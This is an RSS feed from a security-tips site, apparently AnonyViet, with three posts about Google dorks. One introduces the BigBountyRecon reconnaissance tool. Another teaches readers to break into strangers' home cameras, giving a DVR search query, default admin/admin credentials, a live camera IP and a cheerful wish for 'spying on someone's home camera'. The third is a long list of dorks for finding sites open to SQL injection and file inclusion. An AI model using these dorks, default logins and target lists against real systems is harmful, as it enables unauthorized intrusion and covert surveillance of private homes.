<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>Dork &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/dork/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Fri, 11 Aug 2023 23:42:41 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.1</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>Dork &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>BigBountyRecon: Google Dork Spying Tool</title>
		<link>https://en.anonyviet.com/bigbountyrecon-google-dork-spying-tool/</link>
					<comments>https://en.anonyviet.com/bigbountyrecon-google-dork-spying-tool/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 11 Aug 2023 23:42:41 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[BigBountyRecon]]></category>
		<category><![CDATA[Dork]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[spying]]></category>
		<category><![CDATA[tool]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=12918</guid>

					<description><![CDATA[BigBountyRecon uses 58 different techniques using various open source tools and Google dorks to speed up the process of spying on targets. Reconnaissance is the most important step in any penetration test or bug hunting process. It gives the attacker some preliminary information about the target. Furthermore, it would be helpful to have a clear [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>BigBountyRecon uses 58 different techniques using various open source tools and Google dorks to speed up the process of spying on targets.  Reconnaissance is the most important step in any penetration test or bug hunting process.  It gives the attacker some preliminary information about the target.  Furthermore, it would be helpful to have a clear understanding of what protections are in place as well as some rough estimates of how secure the target is.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet </span> ???? <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  ????</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="12918" fifu-featured="1" decoding="async" fetchpriority="high" class="aligncenter wp-image-41048 size-full" src="https://anonyviet.com/wp-content/uploads/2022/04/104112108-d9145c00-533e-11eb-85be-cb1d33fc9362.jpg" alt="BigBountyRecon: Google Dork Spying Tool" title="BigBountyRecon: Google Dork Spying Tool" width="600" height="371" srcset="https://anonyviet.com/wp-content/uploads/2022/04/104112108-d9145c00-533e-11eb-85be-cb1d33fc9362.jpg 600w, https://anonyviet.com/wp-content/uploads/2022/04/104112108-d9145c00-533e-11eb-85be-cb1d33fc9362-300x186.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" title="BigBountyRecon: A spy tool with Google Dork 6"/></p>
<p>This tool can be used for bug hunting.  The idea of ​​this tool is to quickly check and gather information about your goals without investing time and remembering these tasks.  In addition, it can help you identify several approaches to quickly target mining.</p>
<h2 id="ftoc-ky-thuat-ma-bigbountyrecon-su-dung" class="ftwp-heading">The technique that BigBountyRecon uses</h2>
<p>BigBountyRecon has 58 different techniques, but to save time, I only introduce 10 techniques that I find most impressive and used below:</p>
<p>1. Directory listing: Finding directories open with Google Dork on the target helps you understand the directory structure on the web server.  It may expose sensitive information or may lead to information disclosure.</p>
<p>2. Configuration files: Typically, configuration files contain sensitive information such as hard-coded passwords, sensitive drive locations, or API keys that can help you gain privileged access to internal resources .</p>
<p>3. Database file: A database file is a data file used to store the contents of a database in the format of separate tables and fields.  Depending on the nature of the web application, these files may provide access to sensitive information.</p>
<p>4. WordPress: WordPress is an open source CMS written in PHP.  WordPress has thousands of plugins to build, customize, and enhance websites.  But there are also a lot of holes in these plugins.</p>
<p>5. Log files: Log files sometimes provide detailed information about user activity in a particular application.  These files are typically used to view session cookies or other types of tokens.</p>
<p>6. Backup files and legacy files: Backup files are original copies of important systems.  They provide access to PII or access to sensitive records.</p>
<p>7. Login Pages: It is extremely important to define your target&#8217;s login pages to perform bruteforce or try default logins to gain more access to the organization&#8217;s resources.</p>
<p>8. SQL Error: SQL Error leaking sensitive information about backend system.  This can help you enumerate the database types and see if the application is vulnerable to input validation related errors like <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fsql-injection-la-gi-lam-the-nao-de-ngan-chan-lo-hong-sql-injection%2F" class="local-link" rel="noopener">SQL Injection</a> or not.</p>
<p>9. Apache configuration file: The Apache HTTP server is configured by placing directives in a plain text configuration file.  The main configuration file is usually httpd.conf.  Depending on the entries in these configuration files, it may reveal database connection strings, usernames and passwords, inner workings, used and referenced libraries as well as application logic.</p>
<p>10. Robots.txt file: The Robots.txt file instructs web robots how to crawl their web pages.  Depending on the contents of the file, an attacker can discover hidden folders and files.</p>
<p>In addition, there are 48 more techniques that you can learn <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FViralmaniar%2FBigBountyRecon" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">here</a>.</p>
<h2 id="ftoc-cach-su-dung-bigbountyrecon" class="ftwp-heading">How to use BigBountyRecon</h2>
<p><strong>Step 1:</strong> First you download the BigBountyRecon tool here.</p>
<p><strong>Step 2:</strong> Next you need to open the downloaded EXE file.</p>
<p><strong>Step 3:</strong> Enter the domain name of the target.</p>
<p><strong>Step 4:</strong> Click the various buttons in the tool to find information.</p>
<p><strong>Step 5:</strong> In case of encountering Google Captcha, you just need to authenticate and continue.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;41047&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;0&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;0&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 0\/5 - (0 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;BigBountyRecon: C\u00f4ng c\u1ee5 do th\u00e1m b\u1eb1ng Google Dork&quot;,&quot;width&quot;:&quot;0&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>
            <span class="kksr-muted">Rate this post</span>
    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/bigbountyrecon-google-dork-spying-tool/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2022/04/104112108-d9145c00-533e-11eb-85be-cb1d33fc9362.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Dork Google: view cameras around the world</title>
		<link>https://en.anonyviet.com/dork-google-view-cameras-around-the-world/</link>
					<comments>https://en.anonyviet.com/dork-google-view-cameras-around-the-world/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 03:46:40 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Cameras]]></category>
		<category><![CDATA[Dork]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[view]]></category>
		<category><![CDATA[World]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7717</guid>

					<description><![CDATA[Today admin will guide you how to spy on other people&#8217;s home cameras. Join the channel Telegram of the AnonyViet 👉 Link 👈 Usually they will NAT via static IP or dyndns, noip, by finding the keyword of the camera device we can know what is the public IP of the camera? Then access the [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>Today admin will guide you how to spy on other people&#8217;s home cameras.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>Usually they will NAT via static IP or dyndns, noip, by finding the keyword of the camera device we can know what is the public IP of the camera?</p>
<p>Then access the IP enter username/password and enjoy.<br />Go to google and type keywords:</p>
<p><a target="_blank" style="line-height: 1.75;" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2015%2F12%2F111.png" rel="attachment wp-att-602 noopener" class="local-link"><img post-id="7717" fifu-featured="1" decoding="async" class="wp-image-602 size-full aligncenter" src="https://anonyviet.com/wp-content/uploads/2015/12/111.png" alt="Dork Google: view cameras around the world" title="Dork Google: view cameras around the world" width="1279" height="757" srcset="https://anonyviet.com/wp-content/uploads/2015/12/111.png 1279w, https://anonyviet.com/wp-content/uploads/2015/12/111-300x178.png 300w, https://anonyviet.com/wp-content/uploads/2015/12/111-1024x606.png 1024w, https://anonyviet.com/wp-content/uploads/2015/12/111-768x455.png 768w, https://anonyviet.com/wp-content/uploads/2015/12/111-750x444.png 750w, https://anonyviet.com/wp-content/uploads/2015/12/111-1140x675.png 1140w" sizes="(max-width: 1279px) 100vw, 1279px" title="Dork Google: view cameras around the world 6"/></a></p>
<p>Go to google and type keywords:</p>
<pre class="lang:default decode:true ">intitle:"CPPLUS DVR -Web View"</pre>
<p>Go to a website and if it asks to download the plugin, download and install it</p>
<p>Normally user/pass is admin/admin</p>
<p>Wish you have an experience of spying on someone&#8217;s home camera</p>
<p>Here is an example <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com" rel="noopener" class="local-link">anonyviet.com</a> found today: http://188.136.148.124/</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;601&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/dork-google-view-cameras-around-the-world/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/12/111.png" medium="image"></media:content>
            	</item>
		<item>
		<title>Dork SQL 2015 &#8211; AnonyViet</title>
		<link>https://en.anonyviet.com/dork-sql-2015-anonyviet/</link>
					<comments>https://en.anonyviet.com/dork-sql-2015-anonyviet/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 02:51:39 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[AnonyViet]]></category>
		<category><![CDATA[Dork]]></category>
		<category><![CDATA[SQL]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7696</guid>

					<description><![CDATA[List dork sql injection 2015 Join the channel Telegram of the AnonyViet 👉 Link 👈 trainers.php?id=&#13; article.php?ID=&#13; play_old.php?id=&#13; declaration_more.php?decl_id=&#13; Pageid=&#13; games.php?id=&#13; newsDetail.php?id=&#13; staff_id=&#13; historialeer.php?num=&#13; product-item.php?id=&#13; news_view.php?id=&#13; humor.php?id=&#13; communique_detail.php?id=&#13; sem.php3?id=&#13; opinions.php?id=&#13; spr.php?id=&#13; pages.php?id=&#13; chappies.php?id=&#13; prod_detail.php?id=&#13; viewphoto.php?id=&#13; view.php?id=&#13; website.php?id=&#13; hosting_info.php?id=&#13; gery.php?id=&#13; detail.php?ID=&#13; publications.php?id=&#13; Productinfo.php?id=&#13; releases.php?id=&#13; ray.php?id=&#13; produit.php?id=&#13; pop.php?id=&#13; shopping.php?id=&#13; productdetail.php?id=&#13; post.php?id=&#13; section.php?id=&#13; theme.php?id=&#13; page.php?id=&#13; shredder-categories.php?id=&#13; product_ranges_view.php?ID=&#13; shop_category.php?id=&#13; [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>List dork sql injection 2015</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<pre class="minimize:true lang:default decode:true">trainers.php?id=&#13;
article.php?ID=&#13;
play_old.php?id=&#13;
declaration_more.php?decl_id=&#13;
Pageid=&#13;
games.php?id=&#13;
newsDetail.php?id=&#13;
staff_id=&#13;
historialeer.php?num=&#13;
product-item.php?id=&#13;
news_view.php?id=&#13;
humor.php?id=&#13;
communique_detail.php?id=&#13;
sem.php3?id=&#13;
opinions.php?id=&#13;
spr.php?id=&#13;
pages.php?id=&#13;
chappies.php?id=&#13;
prod_detail.php?id=&#13;
viewphoto.php?id=&#13;
view.php?id=&#13;
website.php?id=&#13;
hosting_info.php?id=&#13;
gery.php?id=&#13;
detail.php?ID=&#13;
publications.php?id=&#13;
Productinfo.php?id=&#13;
releases.php?id=&#13;
ray.php?id=&#13;
produit.php?id=&#13;
pop.php?id=&#13;
shopping.php?id=&#13;
productdetail.php?id=&#13;
post.php?id=&#13;
section.php?id=&#13;
theme.php?id=&#13;
page.php?id=&#13;
shredder-categories.php?id=&#13;
product_ranges_view.php?ID=&#13;
shop_category.php?id=&#13;
channel_id=&#13;
newsid=&#13;
news_display.php?getid=&#13;
ages.php?id=&#13;
clanek.php4?id=&#13;
review.php?id=&#13;
iniziativa.php?in=&#13;
curriculum.php?id=&#13;
labels.php?id=&#13;
look.php?ID=&#13;
galeri_info.php?l=&#13;
tekst.php?idt=&#13;
newscat.php?id=&#13;
newsticker_info.php?idn=&#13;
rubrika.php?idr=&#13;
offer.php?idf=&#13;
"id=" &amp; intext:"Warning: mysql_fetch_array()&#13;
"id=" &amp; intext:"Warning: getimagesize()&#13;
"id=" &amp; intext:"Warning: session_start()&#13;
"id=" &amp; intext:"Warning: mysql_num_rows()&#13;
"id=" &amp; intext:"Warning: mysql_query()&#13;
"id=" &amp; intext:"Warning: array_merge()&#13;
"id=" &amp; intext:"Warning: preg_match()&#13;
"id=" &amp; intext:"Warning: ilesize()&#13;
"id=" &amp; intext:"Warning: filesize()&#13;
index.php?id=&#13;
buy.php?category=&#13;
article.php?ID=&#13;
play_old.php?id=&#13;
newsitem.php?num=&#13;
top10.php?cat=&#13;
historialeer.php?num=&#13;
reagir.php?num=&#13;
Stray-Questions-View.php?num=&#13;
forum_bds.php?num=&#13;
game.php?id=&#13;
view_product.php?id=&#13;
sw_comment.php?id=&#13;
news.php?id=&#13;
avd_start.php?avd=&#13;
event.php?id=&#13;
sql.php?id=&#13;
news_view.php?id=&#13;
select_biblio.php?id=&#13;
humor.php?id=&#13;
ogl_inet.php?ogl_id=&#13;
fiche_spectacle.php?id=&#13;
communique_detail.php?id=&#13;
sem.php3?id=&#13;
kategorie.php4?id=&#13;
faq2.php?id=&#13;
show_an.php?id=&#13;
preview.php?id=&#13;
loadpsb.php?id=&#13;
opinions.php?id=&#13;
spr.php?id=&#13;
announce.php?id=&#13;
participant.php?id=&#13;
download.php?id=&#13;
main.php?id=&#13;
review.php?id=&#13;
chappies.php?id=&#13;
read.php?id=&#13;
prod_detail.php?id=&#13;
article.php?id=&#13;
person.php?id=&#13;
productinfo.php?id=&#13;
showimg.php?id=&#13;
view.php?id=&#13;
website.php?id=&#13;
hosting_info.php?id=&#13;
gery.php?id=&#13;
rub.php?idr=&#13;
view_faq.php?id=&#13;
artikelinfo.php?id=&#13;
detail.php?ID=&#13;
index.php?=&#13;
profile_view.php?id=&#13;
category.php?id=&#13;
publications.php?id=&#13;
fellows.php?id=&#13;
downloads_info.php?id=&#13;
prod_info.php?id=&#13;
shop.php?do=part&amp;id=&#13;
collectionitem.php?id=&#13;
band_info.php?id=&#13;
product.php?id=&#13;
releases.php?id=&#13;
ray.php?id=&#13;
produit.php?id=&#13;
pop.php?id=&#13;
shopping.php?id=&#13;
productdetail.php?id=&#13;
post.php?id=&#13;
viewshowdetail.php?id=&#13;
clubpage.php?id=&#13;
memberInfo.php?id=&#13;
section.php?id=&#13;
theme.php?id=&#13;
page.php?id=&#13;
shredder-categories.php?id=&#13;
tradeCategory.php?id=&#13;
product_ranges_view.php?ID=&#13;
shop_category.php?id=&#13;
transcript.php?id=&#13;
channel_id=&#13;
item_id=&#13;
newsid=&#13;
trainers.php?id=&#13;
news-full.php?id=&#13;
news_display.php?getid=&#13;
index2.php?option=&#13;
readnews.php?id=&#13;
newsone.php?id=&#13;
product-item.php?id=&#13;
pages.php?id=&#13;
clanek.php4?id=&#13;
viewapp.php?id=&#13;
viewphoto.php?id=&#13;
galeri_info.php?l=&#13;
iniziativa.php?in=&#13;
curriculum.php?id=&#13;
labels.php?id=&#13;
story.php?id=&#13;
look.php?ID=&#13;
aboutbook.php?id=&#13;
"id=" &amp; intext:"Warning: mysql_fetch_assoc()&#13;
"id=" &amp; intext:"Warning: is_writable()&#13;
"id=" &amp; intext:"Warning: Unknown()&#13;
"id=" &amp; intext:"Warning: mysql_result()&#13;
"id=" &amp; intext:"Warning: pg_exec()&#13;
"id=" &amp; intext:"Warning: require()&#13;
buy.php?category=&#13;
pageid=&#13;
page.php?file=&#13;
show.php?id=&#13;
newsitem.php?num=&#13;
readnews.php?id=&#13;
top10.php?cat=&#13;
reagir.php?num=&#13;
Stray-Questions-View.php?num=&#13;
forum_bds.php?num=&#13;
game.php?id=&#13;
view_product.php?id=&#13;
sw_comment.php?id=&#13;
news.php?id=&#13;
avd_start.php?avd=&#13;
event.php?id=&#13;
sql.php?id=&#13;
select_biblio.php?id=&#13;
ogl_inet.php?ogl_id=&#13;
fiche_spectacle.php?id=&#13;
kategorie.php4?id=&#13;
faq2.php?id=&#13;
show_an.php?id=&#13;
loadpsb.php?id=&#13;
announce.php?id=&#13;
participant.php?id=&#13;
download.php?id=&#13;
article.php?id=&#13;
person.php?id=&#13;
productinfo.php?id=&#13;
showimg.php?id=&#13;
rub.php?idr=&#13;
view_faq.php?id=&#13;
artikelinfo.php?id=&#13;
index.php?=&#13;
profile_view.php?id=&#13;
category.php?id=&#13;
fellows.php?id=&#13;
downloads_info.php?id=&#13;
prod_info.php?id=&#13;
shop.php?do=part&amp;id=&#13;
collectionitem.php?id=&#13;
band_info.php?id=&#13;
product.php?id=&#13;
viewshowdetail.php?id=&#13;
clubpage.php?id=&#13;
memberInfo.php?id=&#13;
tradeCategory.php?id=&#13;
transcript.php?id=&#13;
item_id=&#13;
news-full.php?id=&#13;
aboutbook.php?id=&#13;
preview.php?id=&#13;
material.php?id=&#13;
read.php?id=&#13;
viewapp.php?id=&#13;
story.php?id=&#13;
newsone.php?id=&#13;
rubp.php?idr=&#13;
art.php?idm=&#13;
title.php?id=&#13;
index1.php?modo=&#13;
include.php?*[*]*=&#13;
nota.php?pollname=&#13;
index3.php?p=&#13;
padrao.php?pre=&#13;
home.php?pa=&#13;
main.php?type=&#13;
sitio.php?start=&#13;
*.php?include=&#13;
general.php?xlink=&#13;
show.php?go=&#13;
nota.php?ki=&#13;
down*.php?oldal=&#13;
layout.php?disp=&#13;
enter.php?chapter=&#13;
base.php?incl=&#13;
enter.php?mod=&#13;
show.php?corpo=&#13;
head.php?*[*]*=&#13;
info.php?strona=&#13;
template.php?str=&#13;
main.php?doshow=&#13;
view.php?*[*]*=&#13;
index.php?to=&#13;
page.php?cmd=&#13;
view.php?b=&#13;
info.php?option=&#13;
show.php?x=&#13;
template.php?texto=&#13;
index3.php?ir=&#13;
print.php?chapter=&#13;
file.php?inc=&#13;
file.php?cont=&#13;
view.php?cmd=&#13;
include.php?chapter=&#13;
path.php?my=&#13;
principal.php?param=&#13;
general.php?menue=&#13;
index1.php?b=&#13;
info.php?chapter=&#13;
nota.php?chapter=&#13;
general.php?include=&#13;
start.php?addr=&#13;
index1.php?qry=&#13;
index1.php?loc=&#13;
page.php?addr=&#13;
index1.php?dir=&#13;
principal.php?pr=&#13;
press.php?seite=&#13;
head.php?cmd=&#13;
home.php?sec=&#13;
home.php?category=&#13;
standard.php?cmd=&#13;
mod*.php?thispage=&#13;
base.php?to=&#13;
view.php?choix=&#13;
base.php?panel=&#13;
template.php?mod=&#13;
info.php?j=&#13;
blank.php?pref=&#13;
sub*.php?channel=&#13;
standard.php?in=&#13;
general.php?cmd=&#13;
pagina.php?panel=&#13;
template.php?where=&#13;
path.php?channel=&#13;
gery.php?seccion=&#13;
page.php?tipo=&#13;
sitio.php?rub=&#13;
pagina.php?u=&#13;
file.php?ir=&#13;
*inc*.php?sivu=&#13;
path.php?start=&#13;
page.php?chapter=&#13;
home.php?recipe=&#13;
enter.php?pname=&#13;
layout.php?path=&#13;
print.php?open=&#13;
mod*.php?channel=&#13;
down*.php?phpbb_root_path=&#13;
*inc*.php?str=&#13;
gery.php?phpbb_root_path=&#13;
include.php?middlePart=&#13;
sub*.php?destino=&#13;
info.php?read=&#13;
home.php?sp=&#13;
main.php?strona=&#13;
sitio.php?get=&#13;
sitio.php?index=&#13;
index3.php?option=&#13;
enter.php?a=&#13;
main.php?second=&#13;
print.php?pname=&#13;
blank.php?itemnav=&#13;
blank.php?pagina=&#13;
index1.php?d=&#13;
down*.php?where=&#13;
*inc*.php?include=&#13;
path.php?pre=&#13;
home.php?loader=&#13;
start.php?eval=&#13;
index.php?disp=&#13;
head.php?mod=&#13;
sitio.php?section=&#13;
nota.php?doshow=&#13;
home.php?seite=&#13;
home.php?a=&#13;
page.php?url=&#13;
pagina.php?left=&#13;
layout.php?c=&#13;
principal.php?goto=&#13;
standard.php?base_dir=&#13;
home.php?where=&#13;
page.php?sivu=&#13;
*inc*.php?adresa=&#13;
padrao.php?str=&#13;
include.php?my=&#13;
show.php?home=&#13;
index.php?load=&#13;
index3.php?rub=&#13;
sub*.php?str=&#13;
start.php?index=&#13;
nota.php?mod=&#13;
sub*.php?mid=&#13;
index1.php?*[*]*=&#13;
pagina.php?oldal=&#13;
padrao.php?loc=&#13;
padrao.php?rub=&#13;
page.php?incl=&#13;
gery.php?disp=&#13;
nota.php?oldal=&#13;
include.php?u=&#13;
principal.php?pagina=&#13;
print.php?choix=&#13;
head.php?filepath=&#13;
include.php?corpo=&#13;
sub*.php?action=&#13;
head.php?pname=&#13;
press.php?dir=&#13;
show.php?xlink=&#13;
file.php?left=&#13;
nota.php?destino=&#13;
general.php?module=&#13;
index3.php?redirect=&#13;
down*.php?param=&#13;
default.php?ki=&#13;
padrao.php?h=&#13;
padrao.php?read=&#13;
mod*.php?cont=&#13;
index1.php?l=&#13;
down*.php?pr=&#13;
gery.php?viewpage=&#13;
template.php?load=&#13;
nota.php?pr=&#13;
padrao.php?destino=&#13;
index2.php?channel=&#13;
principal.php?opcion=&#13;
start.php?str=&#13;
press.php?*[*]*=&#13;
index.php?ev=&#13;
pagina.php?pre=&#13;
nota.php?content=&#13;
include.php?adresa=&#13;
sitio.php?t=&#13;
index.php?sivu=&#13;
principal.php?q=&#13;
path.php?ev=&#13;
print.php?module=&#13;
index.php?loc=&#13;
nota.php?basepath=&#13;
padrao.php?tipo=&#13;
index2.php?in=&#13;
principal.php?eval=&#13;
file.php?qry=&#13;
info.php?t=&#13;
enter.php?play=&#13;
general.php?var=&#13;
principal.php?s=&#13;
standard.php?pagina=&#13;
standard.php?subject=&#13;
base.php?second=&#13;
head.php?inc=&#13;
pagina.php?basepath=&#13;
main.php?pname=&#13;
*inc*.php?modo=&#13;
include.php?goto=&#13;
file.php?pg=&#13;
head.php?g=&#13;
general.php?header=&#13;
start.php?*root*=&#13;
enter.php?pref=&#13;
index3.php?open=&#13;
start.php?module=&#13;
main.php?load=&#13;
enter.php?pg=&#13;
padrao.php?redirect=&#13;
pagina.php?my=&#13;
gery.php?pre=&#13;
enter.php?w=&#13;
info.php?texto=&#13;
enter.php?open=&#13;
base.php?rub=&#13;
gery.php?*[*]*=&#13;
include.php?cmd=&#13;
standard.php?dir=&#13;
layout.php?page=&#13;
index3.php?pageweb=&#13;
include.php?numero=&#13;
path.php?destino=&#13;
index3.php?home=&#13;
default.php?seite=&#13;
path.php?eval=&#13;
base.php?choix=&#13;
template.php?cont=&#13;
info.php?pagina=&#13;
default.php?x=&#13;
default.php?option=&#13;
gery.php?ki=&#13;
down*.php?second=&#13;
blank.php?path=&#13;
pagina.php?v=&#13;
file.php?pollname=&#13;
index3.php?var=&#13;
layout.php?goto=&#13;
pagina.php?incl=&#13;
home.php?action=&#13;
include.php?oldal=&#13;
print.php?left=&#13;
print.php?u=&#13;
nota.php?v=&#13;
home.php?str=&#13;
press.php?panel=&#13;
page.php?mod=&#13;
default.php?param=&#13;
down*.php?texto=&#13;
mod*.php?dir=&#13;
view.php?where=&#13;
blank.php?subject=&#13;
path.php?play=&#13;
base.php?l=&#13;
index2.php?rub=&#13;
general.php?opcion=&#13;
layout.php?xlink=&#13;
padrao.php?name=&#13;
pagina.php?nivel=&#13;
default.php?oldal=&#13;
template.php?k=&#13;
main.php?chapter=&#13;
layout.php?chapter=&#13;
layout.php?incl=&#13;
include.php?url=&#13;
base.php?sivu=&#13;
index.php?link=&#13;
sub*.php?cont=&#13;
info.php?oldal=&#13;
general.php?rub=&#13;
default.php?str=&#13;
head.php?ev=&#13;
sub*.php?path=&#13;
view.php?page=&#13;
main.php?j=&#13;
index2.php?basepath=&#13;
gery.php?qry=&#13;
main.php?url=&#13;
default.php?incl=&#13;
show.php?redirect=&#13;
index1.php?pre=&#13;
general.php?base_dir=&#13;
start.php?in=&#13;
show.php?abre=&#13;
index1.php?home=&#13;
home.php?ev=&#13;
index2.php?ki=&#13;
base.php?pag=&#13;
default.php?ir=&#13;
general.php?qry=&#13;
index2.php?home=&#13;
press.php?nivel=&#13;
enter.php?pr=&#13;
blank.php?loader=&#13;
start.php?cmd=&#13;
padrao.php?d=&#13;
sitio.php?recipe=&#13;
principal.php?read=&#13;
standard.php?showpage=&#13;
main.php?pg=&#13;
page.php?panel=&#13;
press.php?addr=&#13;
template.php?s=&#13;
main.php?tipo=&#13;
*inc*.php?ev=&#13;
padrao.php?page=&#13;
show.php?thispage=&#13;
home.php?secao=&#13;
main.php?start=&#13;
enter.php?mid=&#13;
press.php?id=&#13;
main.php?inc=&#13;
index3.php?cmd=&#13;
index.php?pname=&#13;
press.php?subject=&#13;
include.php?sec=&#13;
index3.php?xlink=&#13;
general.php?texto=&#13;
index3.php?go=&#13;
index.php?cmd=&#13;
index3.php?disp=&#13;
index3.php?left=&#13;
sub*.php?middle=&#13;
show.php?modo=&#13;
index1.php?pagina=&#13;
